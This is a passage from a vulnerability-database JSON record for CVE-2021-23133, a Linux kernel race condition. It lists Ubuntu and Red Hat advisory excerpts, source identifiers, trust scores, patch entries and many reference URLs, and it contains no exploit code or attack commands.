linux-image-kvm 5.11.0.1009.9\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. 
\n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n https://ubuntu.com/security/notices/USN-4997-2\n https://ubuntu.com/security/notices/USN-4997-1\n CVE-2020-24586, CVE-2020-24587, CVE-2020-24588, CVE-2020-26139,\n CVE-2020-26141, CVE-2020-26145, CVE-2020-26147, CVE-2021-23133,\n CVE-2021-23134, CVE-2021-31440, CVE-2021-31829, CVE-2021-32399,\n CVE-2021-33034, CVE-2021-33200, CVE-2021-3506, CVE-2021-3543,\n CVE-2021-3609\n\nPackage Information:\n https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9\n\n. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1963232 - CVE-2021-33194 golang: x/net/html: infinite loop in ParseFragment\n\n5. 
JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-1168 - Disable hostname verification in syslog TLS settings\nLOG-1235 - Using HTTPS without a secret does not translate into the correct \u0027scheme\u0027 value in Fluentd\nLOG-1375 - ssl_ca_cert should be optional\nLOG-1378 - CLO should support sasl_plaintext(Password over http)\nLOG-1392 - In fluentd config, flush_interval can\u0027t be set with flush_mode=immediate\nLOG-1494 - Syslog output is serializing json incorrectly\nLOG-1555 - Fluentd logs emit transaction failed: error_class=NoMethodError while forwarding to external syslog server\nLOG-1575 - Rejected by Elasticsearch and unexpected json-parsing\nLOG-1735 - Regression introducing flush_at_shutdown \nLOG-1774 - The collector logs should be excluded in fluent.conf\nLOG-1776 - fluentd total_limit_size sets value beyond available space\nLOG-1822 - OpenShift Alerting Rules Style-Guide Compliance\nLOG-1859 - CLO Should not error and exit early on missing ca-bundle when cluster wide proxy is not enabled\nLOG-1862 - Unsupported kafka parameters when enabled Kafka SASL\nLOG-1903 - Fix the Display of ClusterLogging type in OLM\nLOG-1911 - CLF API changes to Opt-in to multiline error detection\nLOG-1918 - Alert `FluentdNodeDown` always firing \nLOG-1939 - Opt-in multiline detection breaks cloudwatch forwarding\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
},
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
}
],
"trust": 1.89
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2021-23133",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/1",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/04/18/2",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/3",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2021/05/10/4",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "164875",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163249",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "163291",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2021.2589",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2249",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2511",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3905",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2528",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2423",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2409",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2216",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.2079",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.3825",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.4254",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021051015",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-23133",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164837",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163251",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163253",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163255",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163262",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "163301",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "164967",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"id": "VAR-202104-1571",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.625
},
"last_update_date": "2026-04-10T23:03:20.449000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Linux kernel Repair measures for the competition condition problem loophole",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=148726"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2021-23133 log"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-362",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.7,
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b166a20b07382b8bc1dcee2a448715c9c2c81b5b"
},
{
"trust": 1.7,
"url": "https://www.openwall.com/lists/oss-security/2021/04/18/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/1"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/2"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/3"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2021/05/10/4"
},
{
"trust": 1.6,
"url": "https://security.netapp.com/advisory/ntap-20210611-0008/"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00019.html"
},
{
"trust": 1.6,
"url": "https://lists.debian.org/debian-lts-announce/2021/06/msg00020.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23133"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26147"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24588"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24586"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26145"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24587"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26141"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26139"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/paeq3h6hkno6kucgrzvysfsageux23jl/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/cux2ca63453g34c6kyvbljxjxearzi2x/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xzashzvcofj4vu2i3bn5w5ephwjq7qwx/"
},
{
"trust": 0.7,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021051015"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163291/ubuntu-security-notice-usn-5000-2.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/164875/red-hat-security-advisory-2021-4140-02.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2216"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2249"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2589"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3905"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2409"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2528"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.3825"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/163249/ubuntu-security-notice-usn-4997-1.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2423"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2511"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.4254"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.2079"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/linux-kernel-memory-corruption-via-sctp-destroy-sock-35106"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33200"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3506"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23134"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33034"
},
{
"trust": 0.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31829"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-31440"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26143"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24504"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3600"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20239"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26144"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3679"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36158"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3635"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31829"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26145"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-36386"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-33200"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29650"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-0427"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3573"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20194"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24586"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26147"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31916"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26141"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3348"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24588"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26140"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31440"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26146"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29646"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29155"
},
{
"trust": 0.3,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3732"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0129"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3489"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29660"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24587"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26139"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-28971"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24502"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24503"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3659"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3564"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23133"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27777"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-4997-1"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5000-1"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/362.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q2/110"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-23133"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4140"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4356"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4999-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5001-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1033.34"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3600"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1075.83"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5003-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1103.116"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1022.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1106.113"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1118.131"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1089.94"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-147.151"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1106.115"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5000-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4997-2"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36312"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
